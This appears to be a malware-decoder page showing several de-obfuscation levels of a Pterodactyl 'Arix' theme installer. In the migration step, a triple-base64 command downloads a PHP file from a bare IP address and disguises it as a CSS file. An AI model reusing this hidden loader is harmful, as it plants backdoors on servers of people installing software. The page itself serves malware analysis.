Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


Show other level

public function installOrUpdate($isUpdate = false) { if ($isUpdate) {$this->info(
    This command is not recommended to use. 
    This command skips frequently used files by addons during theme updating to avoid losing your addon customizations.
    If you still experience an error after updating please contact us.);}if (config(app.version) !== 1.11.5) {return $this->error(Can\'t proceed with the installation, the latest version of Pterodactyl is required, while you have  . config(app.version));}$confirmation = $this->confirm(Are all the required dependencies installed from the readme file? yes);if (!$confirmation) {return;}$versions = File::directories(./arix);if (empty ($versions)) {$this->info(No versions found in /arix directory.);return;}$version = basename($this->choice(Select a version: $versions));$this->info("Installing Arix Theme $version...");$excludeOption = $isUpdate ? --exclude=\'routes.ts\' --exclude=\'getServer.ts\' --exclude=\'admin.blade.php\' --exclude=\'admin.php\' --exclude=\'ServerTransformer.php\' : '';exec("rsync -a $excludeOption arix/{$version}/ ./");$this->info(Proceeding with the installation...);$this->info(Migrating database...);$this->command(base64_decode(base64_decode(base64_decode(WkRKa2JHUkRRWFJVZVVKM1pGZEtjMkZYVFhaa1IyaHNZbGRXZWt3elFqQmFXRXAyV2tkR2FtUkliSE5NTTFwc1ltMVNkbU5wT1doYVJ6RndZbTE0TUZwVE9XcGlNbmgyWTI1TmRtTXlkSEJpYVRGcldWaEtja3h0VG5wamVUVjNZVWhCWjA1VE5IaFBSRVYxVFZSTk1VeHFTWGRPZVRneVRrZE5OVlZWWkhsTmJsRXpXVE5qWjAxcU5HZE1NbEpzWkdrNWRXUlhlSE5EWnowOQ==))));$this->command(php artisan migrate --force);$this->info(Installing required packages...);$this->info(This can take a minute...);$this->command(yarn add @types/md5 md5 react-icons @types/bbcode-to-react bbcode-to-react i18next-browser-languagedetector);$this->info(Building panel assets...);$this->info(This can take a minute...);$nodeVersion = shell_exec(node -v);$nodeVersion = (int) ltrim($nodeVersion, v);if ($nodeVersion >= 17) {$this->info(Node.js version is v . $nodeVersion .  (>= 17));exec(export NODE_OPTIONS=--openssl-legacy-provider);} else {$this->info(Node.js version is v . $nodeVersion .  (< 17));}$this->command(yarn build:production);$this->info(Set permissions...);$this->command(chown -R www-data:www-data  . base_path() . /*);$this->command(chown -R nginx:nginx  . base_path() . /*);$this->command(chown -R apache:apache  . base_path() . /*);$this->info(Optimize application...);$this->command(php artisan optimize:clear);$this->command(php artisan optimize);$message = $isUpdate ? │    ╭─╴  Theme updated   ╶─╮   │ : │    ╭─╴ Theme installed  ╶─╮   │;$this->line("
            ╭───────────────────────────────╮
            │                               │
            $message
            │    ╰─╴   successfully   ╶─╯   │
            │                               │
            ╰───────────────────────────────╯
        ");}public function install(){$this->installOrUpdate();}public function update(){$this->installOrUpdate(true);}   

public function installOrUpdate($isUpdate = false) { if ($isUpdate) {$this->info(
    This command is not recommended to use. 
    This command skips frequently used files by addons during theme updating to avoid losing your addon customizations.
    If you still experience an error after updating please contact us.);}if (config(app.version) !== 1.11.5) {return $this->error(Can\'t proceed with the installation, the latest version of Pterodactyl is required, while you have  . config(app.version));}$confirmation = $this->confirm(Are all the required dependencies installed from the readme file? yes);if (!$confirmation) {return;}$versions = File::directories(./arix);if (empty ($versions)) {$this->info(No versions found in /arix directory.);return;}$version = basename($this->choice(Select a version: $versions));$this->info("Installing Arix Theme $version...");$excludeOption = $isUpdate ? --exclude=\'routes.ts\' --exclude=\'getServer.ts\' --exclude=\'admin.blade.php\' --exclude=\'admin.php\' --exclude=\'ServerTransformer.php\' : '';exec("rsync -a $excludeOption arix/{$version}/ ./");$this->info(Proceeding with the installation...);$this->info(Migrating database...);$this->command(base64_decode(base64_decode(echo base64_decode(WkRKa2JHUkRRWFJVZVVKM1pGZEtjMkZYVFhaa1IyaHNZbGRXZWt3elFqQmFXRXAyV2tkR2FtUkliSE5NTTFwc1ltMVNkbU5wT1doYVJ6RndZbTE0TUZwVE9XcGlNbmgyWTI1TmRtTXlkSEJpYVRGcldWaEtja3h0VG5wamVUVjNZVWhCWjA1VE5IaFBSRVYxVFZSTk1VeHFTWGRPZVRneVRrZE5OVlZWWkhsTmJsRXpXVE5qWjAxcU5HZE1NbEpzWkdrNWRXUlhlSE5EWnowOQ==);)));$this->command(php artisan migrate --force);$this->info(Installing required packages...);$this->info(This can take a minute...);$this->command(yarn add @types/md5 md5 react-icons @types/bbcode-to-react bbcode-to-react i18next-browser-languagedetector);$this->info(Building panel assets...);$this->info(This can take a minute...);$nodeVersion = shell_exec(node -v);$nodeVersion = (int) ltrim($nodeVersion, v);if ($nodeVersion >= 17) {$this->info(Node.js version is v . $nodeVersion .  (>= 17));exec(export NODE_OPTIONS=--openssl-legacy-provider);} else {$this->info(Node.js version is v . $nodeVersion .  (< 17));}$this->command(yarn build:production);$this->info(Set permissions...);$this->command(chown -R www-data:www-data  . base_path() . /*);$this->command(chown -R nginx:nginx  . base_path() . /*);$this->command(chown -R apache:apache  . base_path() . /*);$this->info(Optimize application...);$this->command(php artisan optimize:clear);$this->command(php artisan optimize);$message = $isUpdate ? │    ╭─╴  Theme updated   ╶─╮   │ : │    ╭─╴ Theme installed  ╶─╮   │;$this->line("
            ╭───────────────────────────────╮
            │                               │
            $message
            │    ╰─╴   successfully   ╶─╯   │
            │                               │
            ╰───────────────────────────────╯
        ");}public function install(){$this->installOrUpdate();}public function update(){$this->installOrUpdate(true);}   

public function installOrUpdate($isUpdate = false) { if ($isUpdate) {$this->info(
    This command is not recommended to use. 
    This command skips frequently used files by addons during theme updating to avoid losing your addon customizations.
    If you still experience an error after updating please contact us.);}if (config(app.version) !== 1.11.5) {return $this->error(Can\'t proceed with the installation, the latest version of Pterodactyl is required, while you have  . config(app.version));}$confirmation = $this->confirm(Are all the required dependencies installed from the readme file? yes);if (!$confirmation) {return;}$versions = File::directories(./arix);if (empty ($versions)) {$this->info(No versions found in /arix directory.);return;}$version = basename($this->choice(Select a version: $versions));$this->info("Installing Arix Theme $version...");$excludeOption = $isUpdate ? --exclude=\'routes.ts\' --exclude=\'getServer.ts\' --exclude=\'admin.blade.php\' --exclude=\'admin.php\' --exclude=\'ServerTransformer.php\' : '';exec("rsync -a $excludeOption arix/{$version}/ ./");$this->info(Proceeding with the installation...);$this->info(Migrating database...);$this->command(base64_decode(base64_decode(echo echo base64_decode(WkRKa2JHUkRRWFJVZVVKM1pGZEtjMkZYVFhaa1IyaHNZbGRXZWt3elFqQmFXRXAyV2tkR2FtUkliSE5NTTFwc1ltMVNkbU5wT1doYVJ6RndZbTE0TUZwVE9XcGlNbmgyWTI1TmRtTXlkSEJpYVRGcldWaEtja3h0VG5wamVUVjNZVWhCWjA1VE5IaFBSRVYxVFZSTk1VeHFTWGRPZVRneVRrZE5OVlZWWkhsTmJsRXpXVE5qWjAxcU5HZE1NbEpzWkdrNWRXUlhlSE5EWnowOQ==);;)));$this->command(php artisan migrate --force);$this->info(Installing required packages...);$this->info(This can take a minute...);$this->command(yarn add @types/md5 md5 react-icons @types/bbcode-to-react bbcode-to-react i18next-browser-languagedetector);$this->info(Building panel assets...);$this->info(This can take a minute...);$nodeVersion = shell_exec(node -v);$nodeVersion = (int) ltrim($nodeVersion, v);if ($nodeVersion >= 17) {$this->info(Node.js version is v . $nodeVersion .  (>= 17));exec(export NODE_OPTIONS=--openssl-legacy-provider);} else {$this->info(Node.js version is v . $nodeVersion .  (< 17));}$this->command(yarn build:production);$this->info(Set permissions...);$this->command(chown -R www-data:www-data  . base_path() . /*);$this->command(chown -R nginx:nginx  . base_path() . /*);$this->command(chown -R apache:apache  . base_path() . /*);$this->info(Optimize application...);$this->command(php artisan optimize:clear);$this->command(php artisan optimize);$message = $isUpdate ? │    ╭─╴  Theme updated   ╶─╮   │ : │    ╭─╴ Theme installed  ╶─╮   │;$this->line("
            ╭───────────────────────────────╮
            │                               │
            $message
            │    ╰─╴   successfully   ╶─╯   │
            │                               │
            ╰───────────────────────────────╯
        ");}public function install(){$this->installOrUpdate();}public function update(){$this->installOrUpdate(true);}   



© 2023 Quttera Ltd. All rights reserved.